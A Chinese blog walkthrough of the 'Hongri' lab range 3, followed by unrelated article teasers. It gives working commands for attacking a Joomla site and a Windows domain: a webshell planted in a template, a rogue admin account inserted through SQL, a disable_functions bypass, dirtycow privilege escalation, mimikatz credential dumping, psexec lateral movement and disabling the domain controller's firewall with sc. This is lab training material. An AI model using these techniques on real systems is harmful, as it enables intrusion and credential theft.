红日靶场3

news/2024/10/2 1:37:52

环境搭建

拿到靶场有5台机子,配置网段,仅主机模式网段vmnet2网段为192.168.93.0即可,出网网卡设置为桥接即可,点击继续运行即可
注意的是web机的两台linux开启后记得拍快照,web机隔一段时间web服务会出问题

web渗透

主机发现(我的桥接网段是192.168.1.0)
namp -sP 192.168.1.0/24
发现192.168.1.110
image

探测服务

namp -sT -Pn 192.168.1.110

image

访问http
image

没发现啥,指纹识别发现joomla的cms

image

msf搜索可利用的脚本,发现可以识别版本

image

得到版本号3.9.12

image

搜索该版本出现的漏洞发现一远程代码执行漏洞

image

链接
https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/Joomla/%EF%BC%88CVE-2020-10238%EF%BC%89Joomla%20%3C%3D%203.9.15%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/

根据该文章发现需要admin登录

接下来进行敏感文件和路径扫描

gobuster dir -u http://192.168.1.110 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

image

得到一/administrator路径访问发现是登陆界面

image
尝试默认弱口令登录
admin 123456
失败

image

扫描文件

ffuf -u http://192.168.1.110/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c -ic -e .asp,.php,.html,.txt,.py

image

image

访问configurarion.php发现啥也没有,试试访问其备份文件configurarion.php~,得到数据库配置得到mysql登录用户密码
testuser cvcvgjASD!@
image

链接mysql

mysql -u testuser -p cvcvgjASD!@ -h 192.168.1.110

查询用户
image

经过一段时间搜索发现一个user表

image
发现administrator用户密码加密后的值
image
尝试hashcat爆破
hashcat -m 3200 -a 0 "\$2y\$10\$t1RelJijihpPhL8LARC9JuM/AWrVR.nto/XycrybdRbk8IEg6Dze2" /usr/share/wordlists/rockyou.txt

没爆出来

继续搜索可用admin登录的方法,搜索joomla重置密码发现可以

image

image
image

链接

https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn

记得修改表名

点击查看代码
INSERT INTO `am2zu_users`(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin1','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');

admin1 secret登录

image

根据前面rce漏洞利用的文章继续利用,在beez3模块下的index.php写入一句话木马

image

根据页面得到url路径/templates/beez3/index.php
image
蚁剑链接

image

执行命令发现没返回,但文件可上传

image

利用蚁剑插件绕过php disable_function

image

上传成功,连接上传的php文件,连接密码仍为一句话密码,但是返回为空

image

搜索发现利用LD_PRELOAD环境变量绕过的更好的方法
链接
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

将x64(x86的不行)的so文件和php文件传到web目录即可,浏览器执行命令

image

访问执行文件成功
image
image

发现反弹啥的不成功

直接信息搜集

image

image

image

得到一个用户和密码

ssh链接,直接命令连失败
image

xshell连成功

内网渗透

image

传提权扫描脚本发现dirtycow

image

直接利用

image

查看ip
ifconfig
image

发现93网段

传fscan扫描其网段

image

发现192.168.93.10(DC)192.168.93.20(test\WIN2008) 192.168.93.30(win7)
并发现开放445等端口

将控制的web机上线到msf

image

添加路由

image

上线win2008,扫描其存在test域
爆破smb密码

点击查看代码
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.93.20 192.168.93.30 192.168.93.10

我字典的问题没爆出来
得到密码123qwe!ASD

域横向

psexec横向
dc没成功,上线2008

点击查看代码
use exploit/windows/smb/psexecset payload windows/meterpreter/bind_tcpset smbuser administratorset smbpass 123qwe!ASDset rhosts 192.168.93.20
run

image

传mimikatz抓取密码
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full"

image

psexec横向域控没成功

建立与dc的ipc链接
net use \\192.168.93.10\ipc$ zxcASDqw123!! /user:test\administrator

sc关闭防火墙

点击查看代码
sc \\192.168.93.10 create aaa binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.10 start aaa

image

image

psexec横向

image
image

拿下域控

image

image

到此结束,还可用计划任务等横向

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.ryyt.cn/news/44918.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈,一经查实,立即删除!

相关文章

2024/6/9

今天写数据库的实验五,使用Java写了一个十分简易的数据库,连输入都没有,只是证明我用Java连上了sqlserver,代码如下:import java.sql.Connection; import java.sql.DriverManager; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.sql.SQLExc…

2024-06-17-Spring 源码阅读(三)Bean 的生命周期

由于 Spring 源码非常多,博客中贴源码会占用大量篇幅,阅读困难。详细分析部分会以 commit 提交形式关联源码提交,画图例来说明源码整体逻辑。 Bean 生命周期主体逻辑 相关代码:Bean的基本创建流程、lazyInit、循环依赖 Bean 对象创建基本流程 通过最开始的关键时机点分析,…

C# TEKLA 二次开发 版本兼容性解决方案

制作的exe程序,就存在版本兼容性问题 用2022 api编译的exe在2024 中无法启动 解决方案 将exe放在如下位置从此处启动exe即可从宏中可以获取string XSDATADIR = ""; TeklaStructuresSettings.GetAdvancedOption("XSDATADIR", ref XSDATADIR);string extens…

欢迎 Stable Diffusion 3 加入 Diffusers

作为 Stability AI 的 Stable Diffusion 家族最新的模型,Stable Diffusion 3 (SD3) 现已登陆 Hugging Face Hub,并且可用在 🧨 Diffusers 中使用了。 当前放出的模型版本是 Stable Diffusion 3 Medium,有二十亿 (2B) 的参数量。 针对当前发布版本,我们提供了:Hub 上可供下…

前端使用 Konva 实现可视化设计器(16)- 旋转对齐、触摸板操作的优化

这一章解决两个缺陷,一是调整一些快捷键,使得 Mac 触摸板可以正常操作;二是修复一个 Issue,使得即使素材节点即使被旋转之后,也能正常触发磁贴对齐效果,有个小坑需要注意。这一章解决两个缺陷,一是调整一些快捷键,使得 Mac 触摸板可以正常操作;二是修复一个 Issue,使…

samba 访问日志 chdir_current_service: vfs_ChDir(/data/share) failed: 权限不够

ubuntu安装了samba服务器,windows可以发现共享目录,但是一打开目录报错,window提示,没有权限 查看samba的用户日志,显示权限不够,下面是配置信息也授予了/data/share为samba的用户及权限 最后发现是,因为data这个目录设置0754,修改为0777就可以了 也是上级目录也要samb…

嵌入式 Linux 基础:环境配置(Debian 12 安装配置)

目录一、安装虚拟机1、安装 VMware Workstation Pro注册博通官网注册账号下载 VMware Workstation Pro2、虚拟机安装 Debian12下载 Debian12 镜像虚拟机设置配置(安装) debian12配置 debian12 环境3、配置 Debian12 软件设置 Flatpak 和 Flathub安装微信二、其他开发环境配置…